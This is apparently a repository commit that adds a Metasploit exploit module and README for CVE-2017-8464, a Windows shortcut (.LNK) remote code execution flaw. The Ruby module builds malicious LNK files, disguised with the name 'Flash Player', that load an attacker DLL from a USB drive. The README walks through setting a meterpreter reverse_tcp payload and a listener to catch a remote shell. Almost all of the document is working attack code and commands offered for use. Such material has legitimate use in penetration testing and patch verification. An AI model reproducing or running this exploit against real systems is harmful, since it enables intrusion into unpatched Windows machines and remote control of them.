CVE-2017-8464

Author: Gitmaninc

CVE-2017-8464/README.md

@@ -0,0 +1,30 @@
+# CVE-2017-8464
+```
+Windows Shell in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, 
+Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 
+allows local users or remote attackers to execute arbitrary code via a crafted .LNK file, which is not properly handled 
+during icon display in Windows Explorer or any other application that parses the icon of the shortcut. 
+aka "LNK Remote Code Execution Vulnerability."
+```
+
+Vulnerability reference:
+ * [CVE-2017-8464](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8464)
+ * [exp-db](https://www.exploit-db.com/exploits/42382/)
+
+
+## load the module within the Metasploit
+[msf](https://www.rapid7.com/db/modules/exploit/windows/local/ms10_092_schelevator)
+```
+msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce
+msf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
+msf exploit(cve_2017_8464_lnk_rce) > set lhost <local-ip>
+msf exploit(cve_2017_8464_lnk_rce) > set lport 8988
+msf exploit(cve_2017_8464_lnk_rce) > run
+msf exploit(ms10_092_schelevator) > exploit
+
+msf exploit(cve_2017_8464_lnk_rce) > use exploit/multi/handler 
+msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
+msf exploit(handler) > set lhost <local-ip>
+msf exploit(handler) > set lport 8988
+msf exploit(handler) > run
+```

CVE-2017-8464/cve_2017_8464_lnk_rce.rb

@@ -0,0 +1,177 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::EXE
+
+  attr_accessor :exploit_dll_name
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'LNK Remote Code Execution Vulnerability',
+      'Description'     => %q{
+        This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)
+        that contain a dynamic icon, loaded from a malicious DLL.
+
+        This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is
+        similar except in an additional SpecialFolderDataBlock is included. The folder ID set
+        in this SpecialFolderDataBlock is set to the Control Panel. This is enought to bypass
+        the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary
+        DLL file.
+      },
+      'Author'          =>
+        [
+          'Uncredited',   # vulnerability discovery
+          'Yorick Koster' # msf module
+        ],
+      'License'         => MSF_LICENSE,
+      'References'      =>
+        [
+          ['CVE', '2017-8464'],
+          ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464'],
+          ['URL', 'http://paper.seebug.org/357/'], # writeup
+          ['URL', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'] # writeup
+        ],
+      'DefaultOptions'  =>
+        {
+          'EXITFUNC'    => 'process',
+        },
+      'Arch'            => [ARCH_X86, ARCH_X64],
+      'Payload'         =>
+        {
+          'Space'       => 2048,
+        },
+      'Platform'        => 'win',
+      'Targets'         =>
+        [
+          [ 'Windows x64', { 'Arch' => ARCH_X64 } ],
+          [ 'Windows x86', { 'Arch' => ARCH_X86 } ]
+        ],
+      'DefaultTarget'  => 0, # Default target is 64-bit
+      'DisclosureDate'  => 'Jun 13 2017'))
+
+    register_advanced_options(
+      [
+        OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true])
+      ])
+  end
+
+  def exploit
+    dll = generate_payload_dll
+    dll_name = "#{rand_text_alpha(16)}.dll"
+    dll_path = store_file(dll, dll_name)
+    print_status("#{dll_path} created copy it to the root folder of the target USB drive")
+
+    # HACK the vulnerability doesn't appear to work with UNC paths
+    # Create LNK files to different drives instead
+    'DEFGHIJKLMNOPQRSTUVWXYZ'.split("").each do |i|
+      lnk = generate_link("#{i}:\\#{dll_name}")
+      lnk_path = store_file(lnk, "#{rand_text_alpha(16)}_#{i}.lnk")
+      print_status("#{lnk_path} create, copy to the USB drive if drive letter is #{i}")
+    end
+  end
+
+  def generate_link(path)
+    path << "\x00"
+    display_name = "Flash Player\x00" # LNK Display Name
+    comment = "\x00"
+
+    # Control Panel Applet ItemID with our DLL
+    cpl_applet = [
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00, 
+      0x00, 0x00
+    ].pack('C*')
+    cpl_applet << [path.length].pack('v')
+    cpl_applet << [display_name.length].pack('v')
+    cpl_applet << path.unpack('C*').pack('v*')
+    cpl_applet << display_name.unpack('C*').pack('v*')
+    cpl_applet << comment.unpack('C*').pack('v*')
+
+    # LinkHeader
+    ret = [
+      0x4c, 0x00, 0x00, 0x00, # HeaderSize, must be 0x0000004C
+      0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, # LinkCLSID, must be 00021401-0000-0000-C000-000000000046
+      0x81, 0x00, 0x00, 0x00, # LinkFlags (HasLinkTargetIDList | IsUnicode)
+      0x00, 0x00, 0x00, 0x00, # FileAttributes
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # CreationTime
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # AccessTime
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # WriteTime
+      0x00, 0x00, 0x00, 0x00, # FileSize
+      0x00, 0x00, 0x00, 0x00, # IconIndex
+      0x00, 0x00, 0x00, 0x00, # ShowCommand
+      0x00, 0x00, # HotKey
+      0x00, 0x00, # Reserved1
+      0x00, 0x00, 0x00, 0x00, # Reserved2
+      0x00, 0x00, 0x00, 0x00  # Reserved3
+    ].pack('C*')
+
+    # IDList
+    idlist_data = ''
+    idlist_data << [0x12 + 2].pack('v') # ItemIDSize
+    idlist_data << [
+      # This PC
+      0x1f, 0x50, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30,
+      0x30, 0x9d
+    ].pack('C*')
+    idlist_data << [0x12 + 2].pack('v') # ItemIDSize
+    idlist_data << [
+      # All Control Panel Items
+      0x2e, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30,
+      0x30, 0x9d
+    ].pack('C*')
+    idlist_data << [cpl_applet.length + 2].pack('v')
+    idlist_data << cpl_applet
+    idlist_data << [0x00].pack('v') # TerminalID
+
+    # LinkTargetIDList
+    ret << [idlist_data.length].pack('v') # IDListSize
+    ret << idlist_data
+
+    # ExtraData
+    # SpecialFolderDataBlock
+    ret << [
+      0x10, 0x00, 0x00, 0x00, # BlockSize
+      0x05, 0x00, 0x00, 0xA0, # BlockSignature 0xA0000005
+      0x03, 0x00, 0x00, 0x00, # SpecialFolderID (CSIDL_CONTROLS - My Computer\Control Panel)
+      0x28, 0x00, 0x00, 0x00  # Offset in LinkTargetIDList
+    ].pack('C*')
+    # TerminalBlock
+    ret << [0x00, 0x00, 0x00, 0x00].pack('V')
+    ret
+  end
+
+  # Store the file in the MSF local directory (eg, /root/.msf4/local/)
+  def store_file(data, filename)
+    ltype = "exploit.fileformat.#{self.shortname}"
+
+    if ! ::File.directory?(Msf::Config.local_directory)
+      FileUtils.mkdir_p(Msf::Config.local_directory)
+    end
+
+    if filename and not filename.empty?
+      if filename =~ /(.*)\.(.*)/
+        ext = $2
+        fname = $1
+      else
+        fname = filename
+      end
+    else
+      fname = "local_#{Time.now.utc.to_i}"
+    end
+
+    fname = ::File.split(fname).last
+
+    fname.gsub!(/[^a-z0-9\.\_\-]+/i, '')
+    fname << ".#{ext}"
+
+    path = File.join("#{Msf::Config.local_directory}/", fname)
+    full_path = ::File.expand_path(path)
+    File.open(full_path, "wb") { |fd| fd.write(data) }
+
+    full_path.dup
+  end
+end